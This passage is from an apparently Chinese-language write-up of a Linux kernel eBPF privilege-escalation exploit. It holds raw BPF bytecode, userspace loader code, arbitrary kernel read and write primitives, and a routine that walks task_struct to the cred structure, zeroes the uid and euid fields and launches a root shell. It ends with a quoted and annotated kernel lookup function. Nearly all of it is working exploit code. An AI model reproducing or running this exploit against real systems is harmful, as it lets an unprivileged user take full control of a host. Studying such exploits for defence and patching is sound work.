        "\x55\x00\x01\x00\x00\x00\x00\x00" // [11] if r0 != 0 goto +1
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [12] exit
        "\x79\x06\x00\x00\x00\x00\x00\x00" // [13] r6 = *(u64 *)(r0 + 0)
        "\xbf\x91\x00\x00\x00\x00\x00\x00" // [14] r1 = r9
        "\xbf\xa2\x00\x00\x00\x00\x00\x00" // [15] r2 = r10
        "\x07\x02\x00\x00\xfc\xff\xff\xff" // [16] r2 += -4
        "\x62\x0a\xfc\xff\x01\x00\x00\x00" // [17] *(u32 *)(r10 - 4) = 1 (key 1)
        "\x85\x00\x00\x00\x01\x00\x00\x00" // [18] call helper 1 (map lookup)
        "\x55\x00\x01\x00\x00\x00\x00\x00" // [19] if r0 != 0 goto +1
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [20] exit
        "\x79\x07\x00\x00\x00\x00\x00\x00" // [21] r7 = *(u64 *)(r0 + 0)
        "\xbf\x91\x00\x00\x00\x00\x00\x00" // [22] r1 = r9
        "\xbf\xa2\x00\x00\x00\x00\x00\x00" // [23] r2 = r10
        "\x07\x02\x00\x00\xfc\xff\xff\xff" // [24] r2 += -4
        "\x62\x0a\xfc\xff\x02\x00\x00\x00" // [25] *(u32 *)(r10 - 4) = 2 (key 2)
        "\x85\x00\x00\x00\x01\x00\x00\x00" // [26] call helper 1 (map lookup)
        "\x55\x00\x01\x00\x00\x00\x00\x00" // [27] if r0 != 0 goto +1
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [28] exit
        "\x79\x08\x00\x00\x00\x00\x00\x00" // [29] r8 = *(u64 *)(r0 + 0)
        "\xbf\x02\x00\x00\x00\x00\x00\x00" // [30] r2 = r0
        "\xb7\x00\x00\x00\x00\x00\x00\x00" // [31] r0 = 0
        "\x55\x06\x03\x00\x00\x00\x00\x00" // [32] if r6 != 0 goto +3 (to [36])
        "\x79\x73\x00\x00\x00\x00\x00\x00" // [33] r3 = *(u64 *)(r7 + 0)
        "\x7b\x32\x00\x00\x00\x00\x00\x00" // [34] *(u64 *)(r2 + 0) = r3
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [35] exit
        "\x55\x06\x02\x00\x01\x00\x00\x00" // [36] if r6 != 1 goto +2 (to [39])
        "\x7b\xa2\x00\x00\x00\x00\x00\x00" // [37] *(u64 *)(r2 + 0) = r10
        "\x95\x00\x00\x00\x00\x00\x00\x00" // [38] exit
        "\x7b\x87\x00\x00\x00\x00\x00\x00" // [39] *(u64 *)(r7 + 0) = r8
        "\x95\x00\x00\x00\x00\x00\x00\x00"; // [40] exit

char bpf_log_buf[LOG_BUF_SIZE];

// 加载bpf指令至内核
static int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version) {
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (__u64)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (__u64)license,
        .log_buf = (__u64)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Create a BPF map through the bpf() syscall (BPF_MAP_CREATE).
 *
 * map_type     kind of map to create
 * key_size     size of one key in bytes
 * value_size   size of one value in bytes
 * max_entries  capacity of the map
 *
 * Returns the raw syscall result.
 */
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries) {
    union bpf_attr attr;

    /* Zero every byte of the union; only the map fields are set below. */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

// 更新map中元素的值
static int bpf_update_elem(uint64_t key, uint64_t value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)&value,
        .flags = 0,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

// 获取map中元素的值
// 这里需要区别BPF_MAP_LOOKUP_ELEM这个系统调用和我们在bpf指令中调用的BPF_FUNC_map_lookup_elem这两者的区别
// 实际上他们的调用基本上是一致的，但是BPF_FUNC_map_lookup_elem得到的是元素的指针，而BPF_MAP_LOOKUP_ELEM在得到元素的指针后，会调用copy_to_user这个函数来讲指针指向的元素值赋值回value
static int bpf_lookup_elem(void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)key,
        .value = (__u64)value,
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/* Print "error: <err>" on stderr and terminate the process with exit(-1). */
static void __exit(char *err) {
    fputs("error: ", stderr);
    fputs(err, stderr);
    fputc('\n', stderr);
    exit(-1);
}

/*
 * One-time setup: create the map, load the program, create the socket
 * pair and attach the program to it. Any failure ends the process
 * through __exit().
 */
static void prep(void) {
    int rc;

    /* Request a map with 3 entries. */
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
    if (mapfd < 0) {
        __exit(strerror(errno));
    }
    printf("map fd is %d\n",mapfd);

    /* Load the payload into the kernel. */
    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
            (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);
    if (progfd < 0) {
        __exit(strerror(errno));
    }

    /* Create the sockets used to make the kernel run the payload. */
    rc = socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets);
    if (rc != 0) {
        __exit(strerror(errno));
    }

    rc = setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd));
    if (rc < 0) {
        __exit(strerror(errno));
    }
}

/*
 * Write one 64-byte datagram to sockets[0]; the data only serves to make
 * the kernel run the attached BPF code. A failed write is reported with
 * perror(); a short write is reported on stderr.
 */
static void writemsg(void) {
    /* Zero-filled so no indeterminate stack bytes are sent. */
    char buffer[64] = {0};

    ssize_t n = write(sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        return;
    }
    /* n is non-negative here, so the cast cannot change its value. */
    if ((size_t)n != sizeof(buffer))
        fprintf(stderr, "short write: %zd\n", n); /* %zd matches ssize_t */
}

/*
 * Define the value of every map entry: set map[0], map[1] and map[2] to
 * a, b and c, then call writemsg(). Wrapped in do { } while (0) so the
 * macro expands to a single statement and stays correct under an
 * unbraced if/else.
 */
#define __update_elem(a, b, c) \
    do { \
        bpf_update_elem(0, (a)); \
        bpf_update_elem(1, (b)); \
        bpf_update_elem(2, (c)); \
        writemsg(); \
    } while (0)

/*
 * Fetch the value stored under the given key in the map; ends the
 * process through __exit() if the lookup fails.
 */
static uint64_t get_value(int key) {
    uint64_t out;
    int rc = bpf_lookup_elem(&key, &out);

    if (rc != 0) {
        __exit(strerror(errno));
    }

    return out;
}

/*
 * Try to obtain a kernel stack address: set the map to {1, 0, 0},
 * trigger one write, and return map[2].
 */
static uint64_t __get_fp(void) {
    uint64_t result;

    __update_elem(1, 0, 0);
    result = get_value(2);

    return result;
}

/*
 * Try to read from an arbitrary address: set the map to {0, addr, 0},
 * trigger one write, and return map[2].
 */
static uint64_t __read(uint64_t addr) {
    uint64_t result;

    __update_elem(0, addr, 0);
    result = get_value(2);

    return result;
}

/*
 * Try to write to an arbitrary address: set the map to {2, addr, val}
 * and trigger one write.
 */
static void __write(uint64_t addr, uint64_t val) {
    __update_elem(2, addr, val);
    return;
}

/*
 * Round addr down to a 0x4000-byte boundary. Per the author's note, the
 * result is the address at which the task_struct pointer is stored; the
 * caller reads that pointer from it.
 */
static uint64_t get_sp(uint64_t addr) {
    const uint64_t alignment = 0x4000;

    return addr - (addr % alignment);
}

/*
 * Main sequence: obtain the frame pointer, derive the aligned stack
 * address, follow task_struct -> cred, zero the uid/gid and euid/egid
 * fields, and start a shell if getuid() and geteuid() then both report 0.
 * Each intermediate value is sanity-checked against PHYS_OFFSET and a
 * failed check ends the process through __exit().
 */
static void pwn(void) {
    /* euidptr was used below without being declared; gidptr was never used. */
    uint64_t fp, sp, task_struct, credptr, uidptr, euidptr;

    fp = __get_fp(); /* value of rbp */
    if (fp < PHYS_OFFSET)
        __exit("bogus fp");

    sp = get_sp(fp); /* aligned kernel stack address */
    if (sp < PHYS_OFFSET)
        __exit("bogus sp");

    task_struct = __read(sp); /* address of the task_struct */

    if (task_struct < PHYS_OFFSET)
        __exit("bogus task ptr");

    printf("task_struct = %lx\n", (unsigned long)task_struct);

    credptr = __read(task_struct + CRED_OFFSET); /* address of the cred structure */

    if (credptr < PHYS_OFFSET)
        __exit("bogus cred ptr");

    uidptr = credptr + UID_OFFSET; /* address of uid */
    if (uidptr < PHYS_OFFSET)
        __exit("bogus uid ptr");
    printf("uidptr = %lx\n", (unsigned long)uidptr);
    /* The stored value is 64 bits wide, so it covers uid and gid (32 bits each). */
    __write(uidptr, 0);

    euidptr = credptr + EUID_OFFSET;
    if (euidptr < PHYS_OFFSET)
        __exit("fake addr");
    printf("euidptr = %lx\n", (unsigned long)euidptr);
    __write(euidptr, 0); /* same 64-bit store, covering euid and egid */

    /*
     * Author's note: under busybox, zeroing only uid and gid is not
     * enough, whereas under bash it is; see the follow-up article.
     */
    if (getuid() == 0 && geteuid() == 0) {
        printf("spawning root shell\n");
        system("/bin/sh"); /* the child shell inherits the same credentials */
        exit(0);
    }

    __exit("not vulnerable?");
}

/* Entry point: run the setup, then the main sequence. Arguments are unused. */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    prep();
    pwn();

    return 0;
}

另外贴一份注释中提到的BPF_MAP_LOOKUP_ELEM的实现

/*
 * Kernel-side handler for the BPF_MAP_LOOKUP_ELEM command (quoted kernel
 * source). Copies the key from user space, looks the element up under
 * the RCU read lock, copies its value into a kernel buffer and then out
 * to the user-supplied value pointer. Returns 0 on success or a negative
 * errno value (-ENOENT when the key is not present).
 */
static int map_lookup_elem(union bpf_attr *attr)
{
    void __user *ukey = u64_to_ptr(attr->key);
    void __user *uvalue = u64_to_ptr(attr->value);
    int ufd = attr->map_fd;
    struct bpf_map *map;
    void *key, *value, *ptr;
    struct fd f;
    int err;

    if (CHECK_ATTR(BPF_MAP_LOOKUP_ELEM))
        return -EINVAL;

    f = fdget(ufd);
    map = __bpf_map_get(f);
    if (IS_ERR(map))
        return PTR_ERR(map);

    err = -ENOMEM;
    key = kmalloc(map->key_size, GFP_USER);
    if (!key)
        goto err_put;

    err = -EFAULT;
    if (copy_from_user(key, ukey, map->key_size) != 0)
        goto free_key;

    err = -ENOMEM;
    value = kmalloc(map->value_size, GFP_USER | __GFP_NOWARN);
    if (!value)
        goto free_key;

    rcu_read_lock();
    ptr = map->ops->map_lookup_elem(map, key); // obtain the pointer to the element
    if (ptr)
        memcpy(value, ptr, map->value_size); // copy the element value into the kernel-side buffer
    rcu_read_unlock();

    err = -ENOENT;
    if (!ptr)
        goto free_value;

    err = -EFAULT;
    if (copy_to_user(uvalue, value, map->value_size) != 0) // copy the kernel-side buffer out to the user-space value
        goto free_value;

    err = 0;

free_value:
    kfree(value);
free_key:
    kfree(key);
err_put:
    fdput(f);
    return err;
}